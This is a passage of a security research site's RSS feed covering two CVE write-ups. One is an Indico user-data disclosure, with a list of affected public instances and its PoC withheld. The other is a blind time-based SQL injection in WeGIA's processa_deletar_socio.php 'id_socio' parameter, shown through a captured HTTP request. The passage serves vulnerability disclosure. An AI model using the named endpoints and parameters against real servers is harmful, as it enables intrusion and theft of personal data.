&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-python&amp;#34; data-lang=&amp;#34;python&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;PoC&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;to&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;be&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;published&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;after&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;responsible&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;disclosure&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;timeline&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53640/image.png&amp;#34;
	width=&amp;#34;598&amp;#34;
	height=&amp;#34;396&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53640/image_hu_6c6de36b9674a4e6.png 480w, /p/cve-2025-53640/image_hu_cfef9b4e7402de52.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;151&amp;#34;
		data-flex-basis=&amp;#34;362px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53640/image-1.png&amp;#34;
	width=&amp;#34;601&amp;#34;
	height=&amp;#34;725&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53640/image-1_hu_af3a0c7700a339e3.png 480w, /p/cve-2025-53640/image-1_hu_80b649f3bc1e6dce.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;82&amp;#34;
		data-flex-basis=&amp;#34;198px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;global-impact&amp;#34;&amp;gt;Global Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt; Indico is a widely adopted event and conference management platform developed by CERN (European Organization for Nuclear Research), powering academic and institutional infrastructure globally:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;CERN (European Organization for Nuclear Research):&amp;lt;/b&amp;gt; Over 900,000 events annually; 200&#43; rooms booked daily.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Worldwide:&amp;lt;/b&amp;gt; Around 145,000 events/year across 300&#43; institutions.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;UN (United Nations):&amp;lt;/b&amp;gt; Over 180,000 participants/year.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;UNOG (United Nations Office at Geneva):&amp;lt;/b&amp;gt; Up to 700,000 users/year.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Extensively used by universities, laboratories, research institutes, and government agencies.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Examples of affected public instances:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://indico.cern.ch/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;https://indico.cern.ch/&amp;lt;a&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://indico.esa.int/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;https://indico.esa.int/&amp;lt;a&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://indico.mit.edu/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;https://indico.mit.edu/&amp;lt;a&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Due to its widespread adoption in &amp;lt;b&amp;gt;scientific, academic, and governmental&amp;lt;/b&amp;gt; environments, this vulnerability poses serious risks:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Identity leakage of researchers, staff, and administrators.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Large-scale privacy breaches and institutional directory exposure.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Targeted reconnaissance for phishing or social engineering.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Potential compromise of sensitive research and policy initiatives.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Disclosure of personal data (PII)&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeration of high-privilege users (admins, organizers)&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Supports mass phishing and spear-phishing operations&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Violates regulations such as &amp;lt;b&amp;gt;GDPR, LGPD&amp;lt;/b&amp;gt;, and internal institutional policies&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;May constitute a reportable breach depending on jurisdiction&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;references&amp;#34;&amp;gt;References
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/Indico/CVE-2025-53640.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/Indico/CVE-2025-53640.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/indico/indico/security/advisories/GHSA-q28v-664f-q6wj&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/indico/indico/security/advisories/GHSA-q28v-664f-q6wj&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributor&amp;#34;&amp;gt;Contributor
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 14 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53823</title>
        <link>https://www.cvehunters.com/p/cve-2025-53823/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-53823/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53823-sql-injection-blind-time-based-vulnerability-in-id_socio-parameter-on-processa_deletar_sociophp-endpoint&amp;#34;&amp;gt;CVE-2025-53823: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;id_socio&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;processa_deletar_socio.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53823&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53823&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id_socio&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/WeGIA/html/socio/sistema/processa_deletar_socio.php&amp;lt;/code&amp;gt; endpoint. This vulnerability allows the execution of arbitrary SQL commands, which can compromise the confidentiality, integrity, and availability of stored data.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;21
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;22
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;POST /WeGIA/html/socio/sistema/processa_deletar_socio.php HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: sec.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: _ga=GA1.1.1386467242.1751041360; PHPSESSID=dqkolkdi6a6546qv0nnjj0lo86; _ga_F8DXBXLV8J=GS2.1.s1751041359$o1$g1$t1751047102$j12$l0$h0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 24
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Ch-Ua-Platform: &amp;amp;#34;Linux&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.9
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Ch-Ua: &amp;amp;#34;Not.A/Brand&amp;amp;#34;;v=&amp;amp;#34;99&amp;amp;#34;, &amp;amp;#34;Chromium&amp;amp;#34;;v=&amp;amp;#34;136&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Ch-Ua-Mobile: ?0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: /
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: application/x-www-form-urlencoded; charset=UTF-8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Origin: https://sec.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: cors
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: empty
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: https://sec.wegia.org:8000/WeGIA/html/socio/sistema/
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=1, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;id_socio=1&amp;amp;amp;pessoa=fisica
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53823/image.png&amp;#34;
	width=&amp;#34;1906&amp;#34;
	height=&amp;#34;732&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53823/image_hu_bf5d4673fc5021aa.png 480w, /p/cve-2025-53823/image_hu_3f7975a45248e0df.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;260&amp;#34;
		data-flex-basis=&amp;#34;624px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53823-sql-injection-blind-time-based-vulnerability-in-id_socio-parameter-on-processa_deletar_sociophp-endpoint&amp;#34;&amp;gt;CVE-2025-53823: SQL Injection (Blind Time-Based) Vulnerability in &amp;lt;code&amp;gt;id_socio&amp;lt;/code&amp;gt; Parameter on &amp;lt;code&amp;gt;processa_deletar_socio.php&amp;lt;/code&amp;gt; Endpoint
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53823&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53823&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A SQL Injection vulnerability was discovered in the &amp;lt;code&amp;gt;id_socio&amp;lt;/code&amp;gt; parameter of the &amp;lt;code&amp;gt;/WeGIA/html/socio/sistema/processa_deletar_socio.php&amp;lt;/code&amp;gt; endpoint. This vulnerability allows the execution of arbitrary SQL commands, which can compromise the confidentiality, integrity, and availability of stored data.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;21
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;22
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;POST /WeGIA/html/socio/sistema/processa_deletar_socio.php HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: sec.wegia.org:8000
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: _ga=GA1.1.1386467242.1751041360; PHPSESSID=dqkolkdi6a6546qv0nnjj0lo86; _ga_F8DXBXLV8J=GS2.1.s1751041359$o1$g1$t1751047102$j12$l0$h0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 24
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Ch-Ua-Platform: &amp;amp;#34;Linux&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.9
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Ch-Ua: &amp;amp;#34;Not.A/Brand&amp;amp;#34;;v=&amp;amp;#34;99&amp;amp;#34;, &amp;amp;#34;Chromium&amp;amp;#34;;v=&amp;amp;#34;136&amp;amp;#34;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Ch-Ua-Mobile: ?0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;X-Requested-With: XMLHttpRequest
